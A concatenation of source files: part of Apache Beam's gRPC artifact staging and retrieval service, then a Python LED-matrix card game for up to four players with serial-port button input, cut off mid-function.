self.logger.warning('Received stop signal, stopping all processes')
def stop(self):
self.logger.info('Stop environment')
self.stop_signal.set()
def close(self):
for node in self.nodes:
node.close()
|
artifact_service.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of an Artifact{Staging,Retrieval}Service.
The staging service here can be backed by any beam filesystem.
"""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import concurrent.futures
import contextlib
import hashlib
import os
import queue
import sys
import tempfile
import threading
from io import BytesIO
from typing import Any
from typing import BinaryIO # pylint: disable=unused-import
from typing import Callable
from typing import Dict
from typing import List
from typing import MutableMapping
from typing import Optional
from typing import Tuple
import grpc
from future.moves.urllib.request import urlopen
from apache_beam.io import filesystems
from apache_beam.io.filesystems import CompressionTypes
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.utils import proto_utils
class ArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
_DEFAULT_CHUNK_SIZE = 2 << 20
def __init__(
self,
file_reader, # type: Callable[[str], BinaryIO]
chunk_size=None,
):
self._file_reader = file_reader
self._chunk_size = chunk_size or self._DEFAULT_CHUNK_SIZE
def ResolveArtifacts(self, request, context=None):
return beam_artifact_api_pb2.ResolveArtifactsResponse(
replacements=request.artifacts)
def GetArtifact(self, request, context=None):
if request.artifact.type_urn == common_urns.artifact_types.FILE.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.ArtifactFilePayload)
read_handle = self._file_reader(payload.path)
elif request.artifact.type_urn == common_urns.artifact_types.URL.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload, beam_runner_api_pb2.ArtifactUrlPayload)
# TODO(Py3): Remove the unneeded contextlib wrapper.
read_handle = contextlib.closing(urlopen(payload.url))
elif request.artifact.type_urn == common_urns.artifact_types.EMBEDDED.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.EmbeddedFilePayload)
read_handle = BytesIO(payload.data)
else:
raise NotImplementedError(request.artifact.type_urn)
with read_handle as fin:
while True:
chunk = fin.read(self._chunk_size)
if not chunk:
break
yield beam_artifact_api_pb2.GetArtifactResponse(data=chunk)
class ArtifactStagingService(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceServicer):
def __init__(
self,
file_writer, # type: Callable[[str, Optional[str]], Tuple[BinaryIO, str]]
):
self._lock = threading.Lock()
self._jobs_to_stage = {
} # type: Dict[str, Tuple[Dict[Any, List[beam_runner_api_pb2.ArtifactInformation]], threading.Event]]
self._file_writer = file_writer
def register_job(
self,
staging_token, # type: str
dependency_sets # type: MutableMapping[Any, List[beam_runner_api_pb2.ArtifactInformation]]
):
if staging_token in self._jobs_to_stage:
raise ValueError('Already staging %s' % staging_token)
with self._lock:
self._jobs_to_stage[staging_token] = (
dict(dependency_sets), threading.Event())
def resolved_deps(self, staging_token, timeout=None):
with self._lock:
dependency_sets, event = self._jobs_to_stage[staging_token]
try:
if not event.wait(timeout):
raise concurrent.futures.TimeoutError()
return dependency_sets
finally:
with self._lock:
del self._jobs_to_stage[staging_token]
def ReverseArtifactRetrievalService(self, responses, context=None):
staging_token = next(responses).staging_token
with self._lock:
try:
dependency_sets, event = self._jobs_to_stage[staging_token]
except KeyError:
if context:
context.set_code(grpc.StatusCode.NOT_FOUND)
context.set_details('No such staging token: %r' % staging_token)
raise
requests = _QueueIter()
class ForwardingRetrievalService(object):
def ResolveArtifactss(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(
resolve_artifact=request))
return next(responses).resolve_artifact_response
def GetArtifact(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(get_artifact=request))
while True:
response = next(responses)
yield response.get_artifact_response
if response.is_last:
break
def resolve():
try:
for key, dependencies in dependency_sets.items():
dependency_sets[key] = list(
resolve_as_files(
ForwardingRetrievalService(),
lambda name: self._file_writer(
os.path.join(staging_token, name)),
dependencies))
requests.done()
except: # pylint: disable=bare-except
requests.abort()
raise
finally:
event.set()
t = threading.Thread(target=resolve)
t.daemon = True
t.start()
return requests
def resolve_as_files(retrieval_service, file_writer, dependencies):
"""Translates a set of dependencies into file-based dependencies."""
# Resolve until nothing changes. This ensures that they can be fetched.
resolution = retrieval_service.ResolveArtifactss(
beam_artifact_api_pb2.ResolveArtifactsRequest(
artifacts=dependencies,
# Anything fetchable will do.
# TODO(robertwb): Take advantage of shared filesystems, urls.
preferred_urns=[],
))
dependencies = resolution.replacements
# Fetch each of the dependencies, using file_writer to store them as
# file-based artifacts.
# TODO(robertwb): Consider parallelizing the actual writes.
for dep in dependencies:
if dep.role_urn == common_urns.artifact_roles.STAGING_TO.urn:
base_name = os.path.basename(
proto_utils.parse_Bytes(
dep.role_payload,
beam_runner_api_pb2.ArtifactStagingToRolePayload).staged_name)
else:
base_name = None
unique_name = '-'.join(
filter(
None,
[hashlib.sha256(dep.SerializeToString()).hexdigest(), base_name]))
file_handle, path = file_writer(unique_name)
with file_handle as fout:
for chunk in retrieval_service.GetArtifact(
beam_artifact_api_pb2.GetArtifactRequest(artifact=dep)):
fout.write(chunk.data)
yield beam_runner_api_pb2.ArtifactInformation(
type_urn=common_urns.artifact_types.FILE.urn,
type_payload=beam_runner_api_pb2.ArtifactFilePayload(
path=path).SerializeToString(),
role_urn=dep.role_urn,
role_payload=dep.role_payload)
def offer_artifacts(
artifact_staging_service, artifact_retrieval_service, staging_token):
"""Offers a set of artifacts to an artifact staging service, via the
ReverseArtifactRetrievalService API.
The given artifact_retrieval_service should be able to resolve/get all
artifacts relevant to this job.
"""
responses = _QueueIter()
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
staging_token=staging_token))
requests = artifact_staging_service.ReverseArtifactRetrievalService(responses)
try:
for request in requests:
if request.HasField('resolve_artifact'):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
resolve_artifact_response=artifact_retrieval_service.
ResolveArtifacts(request.resolve_artifact)))
elif request.HasField('get_artifact'):
for chunk in artifact_retrieval_service.GetArtifact(
request.get_artifact):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=chunk))
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=beam_artifact_api_pb2.GetArtifactResponse(
data=b''),
is_last=True))
responses.done()
except: # pylint: disable=bare-except
responses.abort()
raise
class BeamFilesystemHandler(object):
def __init__(self, root):
self._root = root
def file_reader(self, path):
return filesystems.FileSystems.open(
path, compression_type=CompressionTypes.UNCOMPRESSED)
def file_writer(self, name=None):
full_path = filesystems.FileSystems.join(self._root, name)
return filesystems.FileSystems.create(full_path), full_path
def resolve_artifacts(artifacts, service, dest_dir):
if not artifacts:
return artifacts
else:
return [
maybe_store_artifact(artifact, service,
dest_dir) for artifact in service.ResolveArtifacts(
beam_artifact_api_pb2.ResolveArtifactsRequest(
artifacts=artifacts)).replacements
]
def maybe_store_artifact(artifact, service, dest_dir):
if artifact.type_urn in (common_urns.artifact_types.URL.urn,
common_urns.artifact_types.EMBEDDED.urn):
return artifact
elif artifact.type_urn == common_urns.artifact_types.FILE.urn:
payload = beam_runner_api_pb2.ArtifactFilePayload.FromString(
artifact.type_payload)
if os.path.exists(
payload.path) and payload.sha256 and payload.sha256 == sha256(
payload.path) and False:
return artifact
else:
return store_artifact(artifact, service, dest_dir)
else:
return store_artifact(artifact, service, dest_dir)
def store_artifact(artifact, service, dest_dir):
hasher = hashlib.sha256()
with tempfile.NamedTemporaryFile(dir=dest_dir, delete=False) as fout:
for block in service.GetArtifact(
beam_artifact_api_pb2.GetArtifactRequest(artifact=artifact)):
hasher.update(block.data)
fout.write(block.data)
return beam_runner_api_pb2.ArtifactInformation(
type_urn=common_urns.artifact_types.FILE.urn,
type_payload=beam_runner_api_pb2.ArtifactFilePayload(
path=fout.name, sha256=hasher.hexdigest()).SerializeToString(),
role_urn=artifact.role_urn,
role_payload=artifact.role_payload)
def sha256(path):
hasher = hashlib.sha256()
with open(path, 'rb') as fin:
for block in iter(lambda: fin.read(4 << 20), b''):
hasher.update(block)
return hasher.hexdigest()
class _QueueIter(object):
_END = object()
def __init__(self):
self._queue = queue.Queue()
def put(self, item):
self._queue.put(item)
def done(self):
self._queue.put(self._END)
self._queue.put(StopIteration)
def abort(self, exn=None):
if exn is None:
exn = sys.exc_info()[1]
self._queue.put(self._END)
self._queue.put(exn)
def __iter__(self):
return self
def __next__(self):
item = self._queue.get()
if item is self._END:
raise self._queue.get()
else:
return item
if sys.version_info < (3, ):
next = __next__
|
gameWithCom.py
|
# -*- coding:utf-8 -*-
import LED_display as LED
import threading
import keyboard
import time
import numpy as np
import random
import copy
import os
import sys
import serial
ser = serial.Serial('/dev/ttyACM0', 9600)
ser_who = -1
num_1=[[0,1,0,0],
[1,1,0,0],
[0,1,0,0],
[0,1,0,0],
[1,1,1,0],
[0,0,0,0]]
num_2=[[0,1,0,0],
[1,0,1,0],
[0,0,1,0],
[0,1,0,0],
[1,1,1,0],
[0,0,0,0]]
num_3=[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_4=[[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0],
[0,0,0,0]]
num_5=[[1,1,1,0],
[1,0,0,0],
[1,1,0,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_6=[[0,1,1,0],
[1,0,0,0],
[1,1,0,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
num_7=[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[1,0,0,0],
[1,0,0,0],
[0,0,0,0]]
num_8=[[0,1,1,0],
[1,0,1,0],
[0,1,0,0],
[1,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_9=[[0,1,0,0],
[1,0,1,0],
[0,1,1,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_0=[[0,1,0,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
SP= [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0]]
A= [[0,1,0,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
B= [[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[0,0,0,0]]
C= [[0,1,0,0],
[1,0,1,0],
[1,0,0,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
D= [[1,1,0,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,0,0],
[0,0,0,0]]
E= [[1,1,1,0],
[1,0,0,0],
[1,1,0,0],
[1,0,0,0],
[1,1,1,0],
[0,0,0,0]]
F= [[1,1,1,0],
[1,0,0,0],
[1,1,0,0],
[1,0,0,0],
[1,0,0,0],
[0,0,0,0]]
G= [[0,1,1,0],
[1,0,0,0],
[1,0,1,0],
[1,0,1,0],
[0,1,1,0],
[0,0,0,0]]
H= [[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
I= [[1,1,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[1,1,1,0],
[0,0,0,0]]
J= [[0,0,1,0],
[0,0,1,0],
[0,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
K= [[1,0,1,0],
[1,0,1,0],
[1,1,0,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
L= [[1,0,0,0],
[1,0,0,0],
[1,0,0,0],
[1,0,0,0],
[1,1,1,0],
[0,0,0,0]]
M= [[1,0,1,0],
[1,1,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
N= [[0,0,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,0,0],
[0,0,0,0]]
O= [[0,1,0,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
P= [[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[1,0,0,0],
[1,0,0,0],
[0,0,0,0]]
Q= [[0,1,0,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,1,0]]
R= [[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
S= [[0,1,1,0],
[1,0,0,0],
[0,1,0,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
T= [[1,1,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,0,0,0]]
U= [[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,0,0]]
V= [[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,1,0,0],
[0,0,0,0]]
W= [[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[1,1,1,0],
[1,0,1,0],
[0,0,0,0]]
X= [[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
Y= [[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,0,0,0]]
Z= [[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[1,0,0,0],
[1,1,1,0],
[0,0,0,0]]
ex= [[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
qst= [[1,1,0,0],
[0,0,1,0],
[0,1,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
dot= [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
hadot= [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,1,0,0],
[1,0,0,0]]
colon= [[0,0,0,0],
[0,1,0,0],
[0,0,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
def clean1():
for i in range(8):
for j in range(32):
LED.screen[i][j]=0
def clean2():
for i in range(6,16,1):
for j in range(32):
LED.screen[i][j]=0
def write0(a,b):
q=0
for letter in a:
for i in range(6):
for j in range(4):
if letter[i][j]!=0:
LED.screen[i+6][j+q+2]=letter[i][j]+ b-1
q+=4
def write1(a,b): # a는 글자 출력하고싶은 글자 리스트 , b는 컬러
q=0
for letter in a:
for i in range(6):
for j in range(4):
if letter[i][j]!=0:
LED.screen[i][j+q]=letter[i][j]+ b-1
q+=4
def write2(a,b):
q=0
for letter in a:
for i in range(6):
for j in range(4):
if letter[i][j]!=0:
LED.screen[i+6][j+q]=letter[i][j]+b-1
q+=4
def printgoodgameset(a):
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
write1([SP,P,a,SP,W,I,N,ex],5)
for i in [num_3,num_2,num_1]:
write0([SP,SP,SP,i],3)
time.sleep(1)
clean2()
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
def printbadgameset(a):
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
write1([SP,P,a,SP,F,A,I,L],5)
for i in [num_3,num_2,num_1]:
write0([SP,SP,SP,i],3)
time.sleep(1)
clean2()
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
iScreen = [[0 for x in range(32)] for x in range(16)]
class Card:
coord = None
color = None
count = None
def __init__(self, coord = np.zeros((8,16)), color = 0, count = 0):
self.coord = [ [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
self.color = color +1
for i in range(8):
for j in range(16):
if coord[i][j] != 0:
self.coord[i][j] = coord[i][j] + color
self.count = count
class Player:
player_id = None
time = 9.9
hand_cards = None
order = None
card = None
live = None
def __init__ (self, player_id = "", time = 0, hand_cards = [], order=0):
self.player_id = player_id
self.time = time
self.hand_cards = hand_cards
self.order = order
self.card = None
self.live = True
def output(self):
global present_surface_card, present_sum,present_total_card, time1
if len(self.hand_cards) == 0:
lose()
else:
if self.card is not None:
present_surface_card[0] = []
present_sum[self.card.color-1] = present_sum[self.card.color-1] - self.card.count
self.card = self.hand_cards.pop()
present_surface_card[0] = [self.card]
present_total_card = present_total_card+[self.card]
present_sum[self.card.color-1] = present_sum[self.card.color-1] + self.card.count
print("[R G Y B]")
print(present_sum)
if(self.order == 1):
for i in range(8):
for j in range(16):
LED.screen[i][j]=self.card.coord[i][j]
elif(self.order == 2):
for i in range(8):
for j in range(16):
LED.screen[i][j+16]=self.card.coord[i][j]
elif(self.order == 3):
for i in range(8):
for j in range(16):
LED.screen[i+8][j]=self.card.coord[i][j]
elif(self.order == 4):
for i in range(8):
for j in range(16):
LED.screen[i+8][j+16]=self.card.coord[i][j]
time1 = time.time()
oneCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
twoCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1],
[1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
threeCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1],
[1,0,0,0,0,0,0,1,1,0,0,0,1,1,0,1],
[1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
fourCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1],
[1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1],
[1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
fiveCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,1,1,0,0,0,1,1,0,1],
[1,0,1,1,0,0,0,1,1,0,0,0,1,1,0,1],
[1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1],
[1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
TAKE = 0
total_card = [] #리스트형의 전체 카드
present_sum = np.asarray([0,0,0,0]) # 각 카드에 대한 그림 개수 저장
present_surface_card = [[],[],[],[]]
present_total_card = [] # 필드에 있는 사용자들의 모든 카드
card1 = None
card2 = None
card3 = None
card4 = None
p1 = []
p2 = []
p3 = []
p4 = []
player_list=[]
who = -1
time1 = None
def LED_init():
thread=threading.Thread(target=LED.main, args=())
thread.setDaemon(True)
thread.start()
return
def initCard():
global total_card
for i in range(4):
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(twoCard, i, 2))
total_card.append(Card(twoCard, i, 2))
total_card.append(Card(twoCard, i, 2))
total_card.append(Card(threeCard, i, 3))
total_card.append(Card(threeCard, i, 3))
total_card.append(Card(threeCard, i, 3))
total_card.append(Card(fourCard, i, 4))
total_card.append(Card(fourCard, i, 4))
total_card.append(Card(fiveCard, i, 5))
random.shuffle(total_card)
def initPlayer(mode):
global total_card, p1,p2,p3,p4,player_list
# getPlayerName() -> p1.name, p2.name, p3.name, p4.name
if(mode == 0):
p1 = Player("P1", 9.99,total_card[0:14], 1)
p2 = Player("P2", 9.99,total_card[14:28], 2)
p3 = Player("P3", 9.99,total_card[28:42], 3)
p4 = Player("P4", 9.99,total_card[42:], 4)
player_list = [p1,p2,p3,p4]
else:
p1 = Player("P1", 9.99, total_card[0:28],1)
p2 = Player("COM", 9.99, total_card[28:56],2)
def check_cards():
global present_sum, TAKE
if 5 in present_sum:
TAKE = 1
else:
TAKE = 0
def update_label_remaining(): # LED 출력으로 바뀌어야 함
global p1,p2,p3,p4,present_total_card,present_sum
print("p1:",len(p1.hand_cards))
print("p2:",len(p2.hand_cards))
print("p3:",len(p3.hand_cards))
print("p4:",len(p4.hand_cards))
########################################################################################
def gamesetlose():
global p1,p2,p3,p4, player_list
if len(p1.hand_cards) == 0 and p1.live == True:
print("p1 lose")
player_list.remove(p1)
for i in range(8):
for j in range(16):
LED.screen[i][j] = 0
p1.live = False
p1.card = None
if len(p2.hand_cards) == 0 and p2.live == True:
print("p2 lose")
player_list.remove(p2)
for i in range(8):
for j in range(16):
LED.screen[i][j+16] = 0
p2.live = False
p2.card = None
if len(p3.hand_cards) == 0 and p3.live == True:
print("p3 lose")
player_list.remove(p3)
for i in range(8):
for j in range(16):
LED.screen[i+8][j] = 0
p3.live = False
p3.card = None
if len(p4.hand_cards) == 0 and p4.live == True:
print("p4 lose")
player_list.remove(p4)
for i in range(8):
for j in range(16):
LED.screen[i+8][j+16] = 0
p4.live = False
p4.card = None
##################################################################
def lose():
global p1,p2,p3,p4, player_list
if len(p1.hand_cards) == 0 and p1.live == True:
print("p1 lose")
player_list.remove(p1)
for i in range(8):
for j in range(16):
LED.screen[i][j] = 0
p1.live = False
if(p1.card != None):
present_sum[p1.card.color-1] = present_sum[p1.card.color-1] - p1.card.count
p1.card = None
if len(p2.hand_cards) == 0 and p2.live == True:
print("p2 lose")
player_list.remove(p2)
for i in range(8):
for j in range(16):
LED.screen[i][j+16] = 0
p2.live = False
if (p2.card != None):
present_sum[p2.card.color-1] = present_sum[p2.card.color-1] - p2.card.count
p2.card = None
if len(p3.hand_cards) == 0 and p3.live == True:
print("p3 lose")
player_list.remove(p3)
for i in range(8):
for j in range(16):
LED.screen[i+8][j] = 0
p3.live = False
if(p3.card != None):
present_sum[p3.card.color-1] = present_sum[p3.card.color-1] - p3.card.count
p3.card = None
if len(p4.hand_cards) == 0 and p4.live == True:
print("p4 lose")
player_list.remove(p4)
for i in range(8):
for j in range(16):
LED.screen[i+8][j+16] = 0
p4.live = False
if(p4.card != None):
present_sum[p4.card.color-1] = present_sum[p4.card.color-1] - p4.card.count
p4.card = None
flag=0
flag_1 = 0
flag_2 = 0
flag_3 = 0
flag_4 = 0
t1 = 0
t2 = 0
t3 = 0
t4 = 0
p1_ready = p2_ready = p3_ready = p4_ready = False
def ser_input():
global ser_who, time1, t1, t2, t3, t4, check, ready_state, p1_ready, p2_ready, p3_ready, p4_ready
ser_who = -1
global flag, flag1, flag2, flag3, flag4
if ready_state == False:
t=9999
else:
t=1
while time.time() - time1 < t :
if ser.readable():
read = ser.readline()
read2 = read.decode('utf8', 'ignore')[:len(read)-1].split()
if(len(read2) < 4):
continue
if ready_state == False:
if int(read2[0]) > 30:
p1_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j]=1
if int(read2[1]) > 30:
p2_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j+8]=2
if int(read2[2]) > 30:
p3_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j+16]=3
if int(read2[3]) > 30:
p4_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j+24]=4
if(p1_ready == True and p2_ready == True and p3_ready == True and p4_ready == True):
flag=1
ready_state=True
return
else:
if int(read2[0])+int(read2[1])+int(read2[2])+int(read2[3])<30:
flag=0
if int(read2[0])> 100 and flag==0 and p1.live==True:
if int(read2[0])>750:
chk=1
t1 = time.time() - time1
ser_who = 1
flag=1
break
if int(read2[1])> 100 and flag==0 and p2.live==True:
if int(read2[1])>750:
chk=1
t2 = time.time() - time1
ser_who = 2
flag=1
break
if int(read2[2])> 100 and flag==0 and p3.live==True:
if int(read2[2])>750:
chk=1
t3 = time.time() - time1
ser_who = 3
flag=1
break
if int(read2[3])> 100 and flag==0 and p4.live==True:
if int(read2[3])>750:
chk=1
t4 = time.time() - time1
ser_who = 4
flag=1
break
def keyboard_input():
global card1, card2, card3, card4
global present_surface_card, present_sum, present_total_card, player_list
global TAKE, who, ser_who, time1, t1, t2, t3, t4
#time1 = time.time()
ser_input()
if (ser_who == 1 and p1.live==True):
if (TAKE == 1):
p1.time = round(min(float(t1), p1.time),3)
print(p1.time)
p1.hand_cards = present_total_card + p1.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_1)
gamesetlose()
elif TAKE == 0:
if len(p1.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p1):
continue
player_list[i].hand_cards.insert(0, p1.hand_cards.pop())
printbadgameset(num_1)
else:
p1.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p1.live==True:
who = player_list.index(p1)
elif (ser_who == 2 and p2.live==True):
if (TAKE == 1):
p2.time = round(min(float(t2),p2.time),3)
print(p2.time)
p2.hand_cards = present_total_card + p2.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_2)
gamesetlose()
elif TAKE == 0:
if len(p2.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p2):
continue
player_list[i].hand_cards.insert(0, p2.hand_cards.pop())
printbadgameset(num_2)
else:
p2.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p2.live==True:
who = player_list.index(p2)
elif (ser_who == 3 and p3.live==True):
if (TAKE == 1):
p3.time = round(min(p3.time,float(t3)) ,3)
print(p3.time)
p3.hand_cards = present_total_card + p3.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_3)
gamesetlose()
# clean_cards()
elif TAKE == 0:
if len(p3.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p3):
continue
player_list[i].hand_cards.insert(0, p3.hand_cards.pop())
printbadgameset(num_3)
else:
p3.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p3.live==True:
who = player_list.index(p3)
elif (ser_who == 4 and p4.live==True):
if (TAKE == 1):
p4.time = round(min(float(t4),p4.time), 3)
print(p4.time)
p4.hand_cards = present_total_card + p4.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_4)
gamesetlose()
elif TAKE == 0:
if len(p4.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p4):
continue
player_list[i].hand_cards.insert(0, p4.hand_cards.pop())
printbadgameset(num_4)
else:
